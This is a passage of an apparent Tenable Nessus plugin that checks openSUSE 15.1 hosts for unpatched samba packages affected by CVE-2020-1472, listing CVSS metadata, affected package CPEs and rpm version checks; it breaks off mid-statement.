SUSE:SLE-15-SP1:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-pcp-pmda-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-pcp-pmda-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-tests-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ctdb-tests-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-binding0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-binding0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc-samr0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libdcerpc0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-krb5pac0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-nbt0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr-standard0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libndr0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libnetapi0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-credentials0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-errors0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-hostconfig0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-passdb0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-python-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy-python3-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-policy0-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamba-util0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsamdb0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbclient0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbconf0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap2-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libsmbldap2-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libtevent-util0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient0-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwbclient0-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( 